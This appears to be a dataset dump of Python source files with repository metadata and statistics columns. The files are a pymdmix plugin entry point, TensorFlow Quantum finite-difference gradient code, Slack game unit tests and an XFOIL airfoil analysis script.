0
| 7
|
5d8305f878d204ca983dec4d2f37793319e90b8f
| 85
|
py
|
Python
|
pymdmix_run/__init__.py
|
mdmix4/pymdmix-run
|
2c3fdeca39f02429ab0040491e2ad016de210795
|
[
"MIT"
] | null | null | null |
pymdmix_run/__init__.py
|
mdmix4/pymdmix-run
|
2c3fdeca39f02429ab0040491e2ad016de210795
|
[
"MIT"
] | null | null | null |
pymdmix_run/__init__.py
|
mdmix4/pymdmix-run
|
2c3fdeca39f02429ab0040491e2ad016de210795
|
[
"MIT"
] | null | null | null |
from pymdmix_run.run import RunPlugin
def get_plugin_class():
    """Entry point used by the pymdmix plugin loader.

    Returns:
        The ``RunPlugin`` class exported by this package.
    """
    plugin_cls = RunPlugin
    return plugin_cls
| 14.166667
| 37
| 0.788235
| 12
| 85
| 5.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164706
| 85
| 5
| 38
| 17
| 0.901408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
f8e4366a7751b37008f9d0e7145ae40afc5eec6d
| 23,685
|
py
|
Python
|
tensorflow_quantum/python/differentiators/linear_combination.py
|
PyJedi/quantum
|
3f4a3c320e048b8a8faf3a10339975d2d5366fb6
|
[
"Apache-2.0"
] | 1
|
2020-03-10T04:12:46.000Z
|
2020-03-10T04:12:46.000Z
|
tensorflow_quantum/python/differentiators/linear_combination.py
|
PyJedi/quantum
|
3f4a3c320e048b8a8faf3a10339975d2d5366fb6
|
[
"Apache-2.0"
] | 2
|
2021-08-25T16:13:38.000Z
|
2022-02-10T02:36:50.000Z
|
tensorflow_quantum/python/differentiators/linear_combination.py
|
PyJedi/quantum
|
3f4a3c320e048b8a8faf3a10339975d2d5366fb6
|
[
"Apache-2.0"
] | 1
|
2020-03-12T07:19:12.000Z
|
2020-03-12T07:19:12.000Z
|
# Copyright 2020 The TensorFlow Quantum Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Compute gradients by combining function values linearly."""
import math
import numbers

import numpy as np
import tensorflow as tf

from tensorflow_quantum.python.differentiators import differentiator
class LinearCombination(differentiator.Differentiator):
    """Differentiate a circuit with respect to its inputs by
    linearly combining values obtained by evaluating the op using parameter
    values perturbed about their forward-pass values.

    >>> my_op = tfq.get_expectation_op()
    >>> weights = [5, 6, 7]
    >>> perturbations = [0, 0.5, 0.25]
    >>> linear_differentiator = tfq.differentiators.LinearCombination(
    ...     weights, perturbations
    ... )
    >>> # Get an expectation op, with this differentiator attached.
    >>> op = linear_differentiator.generate_differentiable_op(
    ...     analytic_op=my_op
    ... )
    >>> qubit = cirq.GridQubit(0, 0)
    >>> circuit = tfq.convert_to_tensor([
    ...     cirq.Circuit(cirq.X(qubit) ** sympy.Symbol('alpha'))
    ... ])
    >>> psums = tfq.convert_to_tensor([[cirq.Z(qubit)]])
    >>> symbol_values_array = np.array([[0.123]], dtype=np.float32)
    >>> # Calculate tfq gradient.
    >>> symbol_values_tensor = tf.convert_to_tensor(symbol_values_array)
    >>> with tf.GradientTape() as g:
    ...     g.watch(symbol_values_tensor)
    ...     expectations = op(circuit, ['alpha'], symbol_values_tensor, psums
    ... )
    >>> # Gradient would be: 5 * f(x+0) + 6 * f(x+0.5) + 7 * f(x+0.25)
    >>> grads = g.gradient(expectations, symbol_values_tensor)
    >>> # Note: this gradient isn't correct in value, but showcases
    >>> # the principle of how gradients can be defined in a very flexible
    >>> # fashion.
    >>> grads
    tf.Tensor([[5.089467]], shape=(1, 1), dtype=float32)
    """

    def __init__(self, weights, perturbations):
        """Instantiate this differentiator.

        Create a LinearCombination differentiator. Pass in weights and
        perturbations as described below.

        Args:
            weights: Python `list` of real numbers representing linear
                combination coefficients for each perturbed function
                evaluation.
            perturbations: Python `list` of real numbers representing
                perturbation values.

        Raises:
            TypeError: if `weights` or `perturbations` is not a numpy array,
                list or tuple of real numbers.
            ValueError: if the two sequences differ in length or
                `perturbations` contains duplicate values.
        """
        if not isinstance(weights, (np.ndarray, list, tuple)):
            raise TypeError("weights must be a numpy array, list or tuple. "
                            "Got {}".format(type(weights)))
        if not all([isinstance(weight, numbers.Real) for weight in weights]):
            raise TypeError("Each weight in weights must be a real number.")
        if not isinstance(perturbations, (np.ndarray, list, tuple)):
            # Bug fix: the original message reported type(weights) here.
            raise TypeError("perturbations must be a numpy array,"
                            " list or tuple. Got {}".format(
                                type(perturbations)))
        if not all([
                isinstance(perturbation, numbers.Real)
                for perturbation in perturbations
        ]):
            raise TypeError("Each perturbation in perturbations must be a"
                            " real number.")
        if len(weights) != len(perturbations):
            raise ValueError("weights and perturbations must have the same "
                             "length.")
        if len(set(perturbations)) != len(perturbations):
            raise ValueError("All values in perturbations must be unique.")
        self.weights = tf.constant(weights)
        self.n_perturbations = tf.constant(len(perturbations))
        self.perturbations = tf.constant(perturbations)

    @tf.function
    def differentiate_analytic(self, programs, symbol_names, symbol_values,
                               pauli_sums, forward_pass_vals, grad):
        """Backprop rule for analytic expectation ops: evaluate the op at
        each non-zero perturbation, combine the results with `self.weights`,
        and apply the chain rule with the incoming `grad`."""
        # these get used a lot
        n_symbols = tf.gather(tf.shape(symbol_names), 0)
        n_programs = tf.gather(tf.shape(programs), 0)
        n_ops = tf.gather(tf.shape(pauli_sums), 1)
        # STEP 1: Generate required inputs for executor
        # in this case I can do this with existing tensorflow ops if i'm clever
        # don't do any computation for a perturbation of zero, just use
        # forward pass values
        mask = tf.not_equal(self.perturbations,
                            tf.zeros_like(self.perturbations))
        non_zero_perturbations = tf.boolean_mask(self.perturbations, mask)
        non_zero_weights = tf.boolean_mask(self.weights, mask)
        n_non_zero_perturbations = tf.gather(tf.shape(non_zero_perturbations),
                                             0)
        # tile up symbols to [n_non_zero_perturbations, n_programs, n_symbols]
        perturbation_tiled_symbols = tf.tile(
            tf.expand_dims(symbol_values, 0),
            tf.stack([n_non_zero_perturbations, 1, 1]))

        def create_3d_perturbation(i, perturbation_values):
            """Generate a tensor the same shape as perturbation_tiled_symbols
            containing the perturbations specified by perturbation_values."""
            ones = tf.cast(
                tf.concat([
                    tf.zeros(
                        tf.stack([n_non_zero_perturbations, n_programs, i])),
                    tf.ones(
                        tf.stack([n_non_zero_perturbations, n_programs, 1])),
                    tf.zeros(
                        tf.stack([
                            n_non_zero_perturbations, n_programs,
                            tf.subtract(n_symbols, tf.add(i, 1))
                        ]))
                ],
                          axis=2), perturbation_values.dtype)
            return tf.einsum('kij,k->kij', ones, perturbation_values)

        def generate_perturbation(i):
            """Perturb each value in the ith column of
            perturbation_tiled_symbols.
            """
            return tf.add(
                perturbation_tiled_symbols,
                tf.cast(create_3d_perturbation(i, non_zero_perturbations),
                        perturbation_tiled_symbols.dtype))

        # create a 4d tensor with the following dimensions:
        # [n_symbols, n_perturbations, n_programs, n_symbols]
        # the zeroth dimension represents the fact that we have to apply
        # a perturbation in the direction of every parameter individually.
        # the first dimension represents the number of perturbations that we
        # have to apply, and the inner 2 dimensions represent the standard
        # input format to the expectation ops
        all_perturbations = tf.map_fn(generate_perturbation,
                                      tf.range(n_symbols),
                                      dtype=tf.float32)
        # reshape everything to fit into expectation op correctly
        total_programs = tf.multiply(
            tf.multiply(n_programs, n_non_zero_perturbations), n_symbols)
        # tile up and then reshape to order programs correctly
        flat_programs = tf.reshape(
            tf.tile(
                tf.expand_dims(programs, 0),
                tf.stack([tf.multiply(n_symbols, n_non_zero_perturbations),
                          1])), [total_programs])
        flat_perturbations = tf.reshape(all_perturbations, [
            tf.multiply(tf.multiply(n_symbols, n_non_zero_perturbations),
                        n_programs), n_symbols
        ])
        # tile up and then reshape to order ops correctly
        flat_ops = tf.reshape(
            tf.tile(
                tf.expand_dims(pauli_sums, 0),
                tf.stack(
                    [tf.multiply(n_symbols, n_non_zero_perturbations), 1, 1])),
            [total_programs, n_ops])
        # STEP 2: calculate the required expectation values
        expectations = self.expectation_op(flat_programs, symbol_names,
                                           flat_perturbations, flat_ops)
        # STEP 3: generate gradients according to the results
        # we know the rows are grouped according to which parameter
        # was perturbed, so reshape to reflect that
        grouped_expectations = tf.reshape(
            expectations,
            [n_symbols,
             tf.multiply(n_non_zero_perturbations, n_programs), -1])

        # now we can calculate the partial of the circuit output with
        # respect to each perturbed parameter
        def rearrange_expectations(grouped):

            def split_vertically(i):
                return tf.slice(grouped, [tf.multiply(i, n_programs), 0],
                                [n_programs, n_ops])

            return tf.map_fn(split_vertically,
                             tf.range(n_non_zero_perturbations),
                             dtype=tf.float32)

        # reshape so that expectations calculated on different programs are
        # separated by a dimension
        rearranged_expectations = tf.map_fn(rearrange_expectations,
                                            grouped_expectations)
        # now we will calculate all of the partial derivatives
        nonzero_partials = tf.einsum(
            'spco,p->sco', rearranged_expectations,
            tf.cast(non_zero_weights, rearranged_expectations.dtype))
        # now add the contribution of a zero term if required
        # find any zero terms
        mask = tf.equal(self.perturbations, tf.zeros_like(self.perturbations))
        zero_weight = tf.boolean_mask(self.weights, mask)
        n_zero_perturbations = tf.gather(tf.shape(zero_weight), 0)
        # this will have shape [n_symbols, n_programs, n_ops]
        partials = tf.cond(
            tf.equal(n_zero_perturbations, 0), lambda: nonzero_partials,
            lambda: nonzero_partials + tf.multiply(
                tf.tile(tf.expand_dims(forward_pass_vals, axis=0),
                        tf.stack([n_symbols, 1, 1])),
                tf.cast(tf.gather(zero_weight, 0), forward_pass_vals.dtype)))
        # now apply the chain rule
        return tf.einsum('sco,co -> cs', partials, grad)

    @tf.function
    def differentiate_sampled(self, programs, symbol_names, symbol_values,
                              pauli_sums, num_samples, forward_pass_vals, grad):
        """Backprop rule for sampled expectation ops; identical to
        `differentiate_analytic` except the expectation op additionally
        receives a (tiled) `num_samples` tensor."""
        # these get used a lot
        n_symbols = tf.gather(tf.shape(symbol_names), 0)
        n_programs = tf.gather(tf.shape(programs), 0)
        n_ops = tf.gather(tf.shape(pauli_sums), 1)
        # STEP 1: Generate required inputs for executor
        # in this case I can do this with existing tensorflow ops if i'm clever
        # don't do any computation for a perturbation of zero, just use
        # forward pass values
        mask = tf.not_equal(self.perturbations,
                            tf.zeros_like(self.perturbations))
        non_zero_perturbations = tf.boolean_mask(self.perturbations, mask)
        non_zero_weights = tf.boolean_mask(self.weights, mask)
        n_non_zero_perturbations = tf.gather(tf.shape(non_zero_perturbations),
                                             0)
        # tile up symbols to [n_non_zero_perturbations, n_programs, n_symbols]
        perturbation_tiled_symbols = tf.tile(
            tf.expand_dims(symbol_values, 0),
            tf.stack([n_non_zero_perturbations, 1, 1]))

        def create_3d_perturbation(i, perturbation_values):
            """Generate a tensor the same shape as perturbation_tiled_symbols
            containing the perturbations specified by perturbation_values."""
            ones = tf.cast(
                tf.concat([
                    tf.zeros(
                        tf.stack([n_non_zero_perturbations, n_programs, i])),
                    tf.ones(
                        tf.stack([n_non_zero_perturbations, n_programs, 1])),
                    tf.zeros(
                        tf.stack([
                            n_non_zero_perturbations, n_programs,
                            tf.subtract(n_symbols, tf.add(i, 1))
                        ]))
                ],
                          axis=2), perturbation_values.dtype)
            return tf.einsum('kij,k->kij', ones, perturbation_values)

        def generate_perturbation(i):
            """Perturb each value in the ith column of
            perturbation_tiled_symbols.
            """
            return tf.add(
                perturbation_tiled_symbols,
                tf.cast(create_3d_perturbation(i, non_zero_perturbations),
                        perturbation_tiled_symbols.dtype))

        # create a 4d tensor with the following dimensions:
        # [n_symbols, n_perturbations, n_programs, n_symbols]
        # the zeroth dimension represents the fact that we have to apply
        # a perturbation in the direction of every parameter individually.
        # the first dimension represents the number of perturbations that we
        # have to apply, and the inner 2 dimensions represent the standard
        # input format to the expectation ops
        all_perturbations = tf.map_fn(generate_perturbation,
                                      tf.range(n_symbols),
                                      dtype=tf.float32)
        # reshape everything to fit into expectation op correctly
        total_programs = tf.multiply(
            tf.multiply(n_programs, n_non_zero_perturbations), n_symbols)
        # tile up and then reshape to order programs correctly
        flat_programs = tf.reshape(
            tf.tile(
                tf.expand_dims(programs, 0),
                tf.stack([tf.multiply(n_symbols, n_non_zero_perturbations),
                          1])), [total_programs])
        flat_perturbations = tf.reshape(all_perturbations, [
            tf.multiply(tf.multiply(n_symbols, n_non_zero_perturbations),
                        n_programs), n_symbols
        ])
        # tile up and then reshape to order ops correctly
        flat_ops = tf.reshape(
            tf.tile(
                tf.expand_dims(pauli_sums, 0),
                tf.stack(
                    [tf.multiply(n_symbols, n_non_zero_perturbations), 1, 1])),
            [total_programs, n_ops])
        flat_num_samples = tf.reshape(
            tf.tile(
                tf.expand_dims(num_samples, 0),
                tf.stack(
                    [tf.multiply(n_symbols, n_non_zero_perturbations), 1, 1])),
            [total_programs, n_ops])
        # STEP 2: calculate the required expectation values
        expectations = self.expectation_op(flat_programs, symbol_names,
                                           flat_perturbations, flat_ops,
                                           flat_num_samples)
        # STEP 3: generate gradients according to the results
        # we know the rows are grouped according to which parameter
        # was perturbed, so reshape to reflect that
        grouped_expectations = tf.reshape(
            expectations,
            [n_symbols,
             tf.multiply(n_non_zero_perturbations, n_programs), -1])

        # now we can calculate the partial of the circuit output with
        # respect to each perturbed parameter
        def rearrange_expectations(grouped):

            def split_vertically(i):
                return tf.slice(grouped, [tf.multiply(i, n_programs), 0],
                                [n_programs, n_ops])

            return tf.map_fn(split_vertically,
                             tf.range(n_non_zero_perturbations),
                             dtype=tf.float32)

        # reshape so that expectations calculated on different programs are
        # separated by a dimension
        rearranged_expectations = tf.map_fn(rearrange_expectations,
                                            grouped_expectations)
        # now we will calculate all of the partial derivatives
        nonzero_partials = tf.einsum(
            'spco,p->sco', rearranged_expectations,
            tf.cast(non_zero_weights, rearranged_expectations.dtype))
        # now add the contribution of a zero term if required
        # find any zero terms
        mask = tf.equal(self.perturbations, tf.zeros_like(self.perturbations))
        zero_weight = tf.boolean_mask(self.weights, mask)
        n_zero_perturbations = tf.gather(tf.shape(zero_weight), 0)
        # this will have shape [n_symbols, n_programs, n_ops]
        partials = tf.cond(
            tf.equal(n_zero_perturbations, 0), lambda: nonzero_partials,
            lambda: nonzero_partials + tf.multiply(
                tf.tile(tf.expand_dims(forward_pass_vals, axis=0),
                        tf.stack([n_symbols, 1, 1])),
                tf.cast(tf.gather(zero_weight, 0), forward_pass_vals.dtype)))
        # now apply the chain rule
        return tf.einsum('sco,co -> cs', partials, grad)
class ForwardDifference(LinearCombination):
    """Differentiate a circuit using forward differencing.

    Forward differencing computes a derivative at a point x using only
    points larger than x (in this way, it is 'one sided'). A closed form for
    the coefficients of this derivative for an arbitrary positive error order
    is used here, which is described in the following article:
    https://www.sciencedirect.com/science/article/pii/S0377042799000886.

    >>> my_op = tfq.get_expectation_op()
    >>> linear_differentiator = tfq.differentiators.ForwardDifference(2, 0.01)
    >>> # Get an expectation op, with this differentiator attached.
    >>> op = linear_differentiator.generate_differentiable_op(
    ...     analytic_op=my_op
    ... )
    >>> qubit = cirq.GridQubit(0, 0)
    >>> circuit = tfq.convert_to_tensor([
    ...     cirq.Circuit(cirq.X(qubit) ** sympy.Symbol('alpha'))
    ... ])
    >>> psums = tfq.convert_to_tensor([[cirq.Z(qubit)]])
    >>> symbol_values_array = np.array([[0.123]], dtype=np.float32)
    >>> # Calculate tfq gradient.
    >>> symbol_values_tensor = tf.convert_to_tensor(symbol_values_array)
    >>> with tf.GradientTape() as g:
    ...     g.watch(symbol_values_tensor)
    ...     expectations = op(circuit, ['alpha'], symbol_values_tensor, psums)
    >>> # Gradient would be: -50 * f(x + 0.02) + 200 * f(x + 0.01) - 150 * f(x)
    >>> grads = g.gradient(expectations, symbol_values_tensor)
    >>> grads
    tf.Tensor([[-1.184372]], shape=(1, 1), dtype=float32)
    """

    def __init__(self, error_order=1, grid_spacing=0.001):
        """Instantiate a ForwardDifference.

        Create a ForwardDifference differentiator, passing along an error
        order and grid spacing to be used to construct differentiator
        coefficients.

        Args:
            error_order: A positive `int` specifying the error order of this
                differentiator. This corresponds to the smallest power
                of `grid_spacing` remaining in the series that was truncated
                to generate this finite differencing expression.
            grid_spacing: A positive `float` specifying how large of a
                grid to use in calculating this finite difference.

        Raises:
            ValueError: if `error_order` is not a positive integer or
                `grid_spacing` is not a positive real number.
        """
        if not (isinstance(error_order, numbers.Integral) and error_order > 0):
            raise ValueError("error_order must be a positive integer.")
        if not (isinstance(grid_spacing, numbers.Real) and grid_spacing > 0):
            raise ValueError("grid_spacing must be a positive real number.")
        self.error_order = error_order
        self.grid_spacing = grid_spacing
        grid_points_to_eval = np.arange(0, error_order + 1)
        weights = []
        for point in grid_points_to_eval:
            if point == 0:
                # Weight of the unperturbed point is minus the harmonic
                # number H(error_order).
                weight = -1 * np.sum(
                    [1 / j for j in np.arange(1, error_order + 1)])
            else:
                # Closed-form forward-difference coefficient. Use the stdlib
                # math.factorial: the np.math alias was removed in NumPy 2.0.
                point = int(point)
                weight = ((-1)**(point + 1) * math.factorial(error_order)) / (
                    point * math.factorial(error_order - point) *
                    math.factorial(point))
            weights.append(weight / grid_spacing)
        super().__init__(weights, grid_points_to_eval * grid_spacing)
class CentralDifference(LinearCombination):
    """Differentiates a circuit using Central Differencing.

    Central differencing computes a derivative at point x using an equal
    number of points before and after x. A closed form for
    the coefficients of this derivative for an arbitrary positive error order
    is used here, which is described in the following article:
    https://www.sciencedirect.com/science/article/pii/S0377042799000886.

    >>> my_op = tfq.get_expectation_op()
    >>> linear_differentiator = tfq.differentiators.CentralDifference(2, 0.01)
    >>> # Get an expectation op, with this differentiator attached.
    >>> op = linear_differentiator.generate_differentiable_op(
    ...     analytic_op=my_op
    ... )
    >>> qubit = cirq.GridQubit(0, 0)
    >>> circuit = tfq.convert_to_tensor([
    ...     cirq.Circuit(cirq.X(qubit) ** sympy.Symbol('alpha'))
    ... ])
    >>> psums = tfq.convert_to_tensor([[cirq.Z(qubit)]])
    >>> symbol_values_array = np.array([[0.123]], dtype=np.float32)
    >>> # Calculate tfq gradient.
    >>> symbol_values_tensor = tf.convert_to_tensor(symbol_values_array)
    >>> with tf.GradientTape() as g:
    ...     g.watch(symbol_values_tensor)
    ...     expectations = op(circuit, ['alpha'], symbol_values_tensor, psums)
    >>> # Gradient would be: -50 * f(x + 0.02) + 200 * f(x + 0.01) - 150 * f(x)
    >>> grads = g.gradient(expectations, symbol_values_tensor)
    >>> grads
    tf.Tensor([[-1.1837807]], shape=(1, 1), dtype=float32)
    """

    def __init__(self, error_order=2, grid_spacing=0.001):
        """Instantiate a CentralDifference.

        Create a CentralDifference differentiator, passing along an error
        order and grid spacing to be used to construct differentiator
        coefficients.

        Args:
            error_order: A positive, even `int` specifying the error order
                of this differentiator. This corresponds to the smallest power
                of `grid_spacing` remaining in the series that was truncated
                to generate this finite differencing expression.
            grid_spacing: A positive `float` specifying how large of a
                grid to use in calculating this finite difference.

        Raises:
            ValueError: if `error_order` is not a positive even integer or
                `grid_spacing` is not a positive real number.
        """
        if not (isinstance(error_order, numbers.Integral) and
                error_order > 0 and error_order % 2 == 0):
            raise ValueError("error_order must be a positive, even integer.")
        if not (isinstance(grid_spacing, numbers.Real) and grid_spacing > 0):
            raise ValueError("grid_spacing must be a positive real number.")
        # Use integer arithmetic throughout: the original computed
        # n = error_order / 2 (a float) and called np.math.factorial on it,
        # which raises TypeError on Python >= 3.10 (and the np.math alias
        # was removed in NumPy 2.0). error_order is even, so // is exact.
        n = error_order // 2
        grid_points_to_eval = np.concatenate([
            np.arange(-n, 0),
            np.arange(1, n + 1)
        ])
        weights = []
        for k in grid_points_to_eval:
            k = int(k)
            numerator = (-1)**(k + 1) * math.factorial(n)**2
            denom = k * math.factorial(n - k) * math.factorial(n + k)
            weights.append(numerator / (denom * grid_spacing))
        super().__init__(weights, grid_points_to_eval * grid_spacing)
| 45.812379
| 80
| 0.609584
| 2,794
| 23,685
| 4.994273
| 0.141016
| 0.017558
| 0.044432
| 0.037624
| 0.8088
| 0.797549
| 0.777053
| 0.768812
| 0.760355
| 0.749176
| 0
| 0.015542
| 0.299134
| 23,685
| 516
| 81
| 45.901163
| 0.82506
| 0.404602
| 0
| 0.723849
| 0
| 0
| 0.040868
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054393
| false
| 0.025105
| 0.016736
| 0.008368
| 0.125523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8e90e672e298127e182eb030542a46c72347765
| 2,423
|
py
|
Python
|
test/game/field_outputter_test.py
|
setokinto/slack-bomber
|
4a9a546fc1fb8966b6eb232f3200d48537abd0b6
|
[
"MIT"
] | 4
|
2016-12-08T02:27:32.000Z
|
2019-02-20T05:55:00.000Z
|
test/game/field_outputter_test.py
|
setokinto/slack-bomber
|
4a9a546fc1fb8966b6eb232f3200d48537abd0b6
|
[
"MIT"
] | 31
|
2016-10-13T10:38:22.000Z
|
2021-07-01T05:27:10.000Z
|
test/game/field_outputter_test.py
|
setokinto/slack-bomber
|
4a9a546fc1fb8966b6eb232f3200d48537abd0b6
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import Mock, patch
from app.game.field_outputter import FieldOutputter
from app.game.field import Field
class FieldOutputterTest(unittest.TestCase):
    """Tests for FieldOutputter's post/edit behavior against a mocked slacker.

    The three tests shared identical mock-setup boilerplate; it is factored
    into `_fresh_slacker` so each test states only its scenario.
    """

    def setUp(self):
        pass

    def _fresh_slacker(self, mocked_slacker):
        """Reset FieldOutputter state and configure the slacker mock.

        Clears the remembered message timestamps and makes post_message
        return a response whose body carries a fixed "ts" value.
        """
        FieldOutputter.recent_field_ts = {}
        response = Mock()
        response.body = {"ts": "tsvalue"}
        mocked_slacker.chat.post_message.return_value = response
        mocked_slacker.chat.update.return_value = None
        mocked_slacker.reactions.add.return_value = None

    @patch("app.game.field_outputter.slacker")
    def test_outputter_send_new_message(self, mocked_slacker):
        # First post to a channel must create a new message, not edit one.
        self._fresh_slacker(mocked_slacker)
        field = Field(10, 8, ["user1", "user2"])
        FieldOutputter.post_field("channel", field)
        self.assertTrue(mocked_slacker.chat.post_message.called)
        self.assertFalse(mocked_slacker.chat.update.called)

    @patch("app.game.field_outputter.slacker")
    def test_Field_should_edit_in_second_post(self, mocked_slacker):
        # Second post to the same channel must edit the existing message.
        self._fresh_slacker(mocked_slacker)
        field = Field(10, 8, ["user1", "user2"])
        FieldOutputter.post_field("channel", field)
        self.assertTrue(mocked_slacker.chat.post_message.called)
        self.assertFalse(mocked_slacker.chat.update.called)
        FieldOutputter.post_field("channel", field)
        self.assertTrue(mocked_slacker.chat.update.called)

    @patch("app.game.field_outputter.slacker")
    def test_Field_should_post_to_other_channel(self, mocked_slacker):
        # A different channel gets a fresh post even after an earlier one.
        self._fresh_slacker(mocked_slacker)
        field = Field(11, 15, ["user1", "user2"])
        FieldOutputter.post_field("channel", field)
        self.assertTrue(mocked_slacker.chat.post_message.called)
        self.assertFalse(mocked_slacker.chat.update.called)
        mocked_slacker.chat.post_message.called = False
        FieldOutputter.post_field("channel2", field)
        self.assertTrue(mocked_slacker.chat.post_message.called)
        self.assertFalse(mocked_slacker.chat.update.called)
| 42.508772
| 70
| 0.704499
| 291
| 2,423
| 5.62543
| 0.182131
| 0.17471
| 0.166158
| 0.102627
| 0.835675
| 0.835675
| 0.814905
| 0.814905
| 0.79047
| 0.79047
| 0
| 0.008656
| 0.189435
| 2,423
| 56
| 71
| 43.267857
| 0.824847
| 0
| 0
| 0.714286
| 0
| 0
| 0.078035
| 0.039637
| 0
| 0
| 0
| 0
| 0.183673
| 1
| 0.081633
| false
| 0.020408
| 0.081633
| 0
| 0.183673
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8e960c693492a608c8e4eb981c6968863bbab72
| 10,579
|
py
|
Python
|
airfoil_shapes_re_v2/xfoil_analysis_v2.py
|
omersan/PGML
|
09de3472341c05ff929fd8bbeb90ab0595e7eaa4
|
[
"Apache-2.0"
] | 6
|
2020-11-26T02:25:21.000Z
|
2022-01-21T01:55:54.000Z
|
airfoil_shapes_re_v2/xfoil_analysis_v2.py
|
zuokuijun/PGML
|
2b919d65e6467b2afdd9f58b9a72f1d5ec74132f
|
[
"Apache-2.0"
] | null | null | null |
airfoil_shapes_re_v2/xfoil_analysis_v2.py
|
zuokuijun/PGML
|
2b919d65e6467b2afdd9f58b9a72f1d5ec74132f
|
[
"Apache-2.0"
] | 5
|
2020-12-26T05:10:00.000Z
|
2021-12-07T08:05:32.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov  4 16:47:31 2020

@author: suraj

Batch XFOIL angle sweeps over NACA airfoil coordinate files at several
Reynolds numbers; each sweep's results are appended as rows to per-family
CSV training-data files, and the last sweep is plotted.

The original script repeated the same load/sweep/record loop five times
(naca4, naca210, naca220, naca230, naca240, naca250); that loop now lives in
`analyze_airfoil`, and CSV files are opened once per batch instead of once
per row. Output files and their contents are unchanged.
"""
import csv
import glob
import os

import numpy as np
import matplotlib.pyplot as plt

from xfoil import XFoil
from xfoil.model import Airfoil

#%% collect NACA 4-digit coordinate files (stem of 8 chars, e.g. 'naca0012')
myFiles = glob.glob('*.txt')
print(myFiles)

naca4_files = [f for f in myFiles if len(f[:-4]) == 8]

#%% reference sweep on the bundled NACA0012 section
xf = XFoil()
from xfoil.test import naca0012
xf.airfoil = naca0012
coords = naca0012.coords
xf.Re = 1e6
xf.max_iter = 80
# 'a' (this reference angle grid) is reused as a column in every CSV row.
a, cl, cd, cm, cpmin = xf.aseq(-20, 22, 2)

#%% sweep configuration (C/D select the trailing digits of the 5-digit names)
Re_list = [1e6, 2e6, 3e6, 4e6]
A_list = [0, 2, 4, 6]
B_list = [0, 2, 4, 6]
C_list = [1]
D_list = [0, 2, 4, 6]


def analyze_airfoil(file, re):
    """Run one XFOIL angle sweep (-20..22 deg, step 2) for one airfoil.

    Args:
        file: airfoil name; coordinates are read from '<file>.txt'.
        re: Reynolds number for the sweep.

    Returns:
        (ac, clc, cdc, rows) where rows is a list of CSV rows of the form
        [name, x-coords..., y-coords..., reference aoa, aoa, Re, cl, cd,
        cm, cpmin].
    """
    airfoil_xy = np.loadtxt(f'{file}.txt', skiprows=0)
    airfoil_xy = np.flip(airfoil_xy, axis=0)
    airfoil_xy = np.round(airfoil_xy, 6)
    xfc = XFoil()
    xfc.airfoil = Airfoil(airfoil_xy[:, 0], airfoil_xy[:, 1])
    xfc.Re = re
    xfc.max_iter = 40
    ac, clc, cdc, cmc, cpminc = xfc.aseq(-20, 22, 2)
    rows = []
    for i in range(ac.shape[0]):
        # NOTE(review): 'a[i]' indexes the global NACA0012 reference sweep,
        # not this airfoil's sweep, exactly as the original did — assumed
        # intentional (sweeps share the same angle grid); verify.
        row = [file]
        row.extend(airfoil_xy[:, 0])
        row.extend(airfoil_xy[:, 1])
        row.append(a[i])
        row.append(ac[i])
        row.append(re)
        row.append(clc[i])
        row.append(cdc[i])
        row.append(cmc[i])
        row.append(cpminc[i])
        rows.append(row)
    return ac, clc, cdc, rows


def append_rows(csv_name, rows):
    """Append rows to csv_name, opening the file once per batch."""
    with open(csv_name, 'a') as csvfile:
        writer = csv.writer(csvfile, delimiter=",")
        writer.writerows(rows)


#%% NACA 4-digit family
if os.path.isfile('train_data_naca4.csv'):
    os.remove('train_data_naca4.csv')
for eachfile in naca4_files:
    for re in Re_list:
        ac, clc, cdc, rows = analyze_airfoil(eachfile[:-4], re)
        append_rows('train_data_naca4.csv', rows)

#%% NACA 5-digit families 210xx .. 250xx
for series in ('210', '220', '230', '240', '250'):
    csv_name = f'train_data_naca{series}.csv'
    if os.path.isfile(csv_name):
        os.remove(csv_name)
    for C in C_list:
        for D in D_list:
            for re in Re_list:
                ac, clc, cdc, rows = analyze_airfoil(f'naca{series}{C}{D}', re)
                append_rows(csv_name, rows)

#%% plot the most recent sweep (ac/clc/cdc hold the last loop's results)
fig, ax = plt.subplots(1, 2, figsize=(12, 5))
ax[0].plot(ac, clc, 'ro-', label='Xfoil NACA0012 (N = 201)')
#ax[0].plot(a, cl, 'bo-', label='Xfoil NACA0012')
ax[0].legend()
ax[1].plot(ac, cdc, 'ro-', label='Xfoil NACA0012 (N = 201)')
#ax[1].plot(a, cd, 'bo-', label='Xfoil NACA0012 ')
ax[1].legend()
plt.show()
fig.tight_layout()
#fig.savefig('naca0012_aoa.png', dpi=300)
| 31.864458
| 68
| 0.502978
| 1,297
| 10,579
| 3.922899
| 0.108712
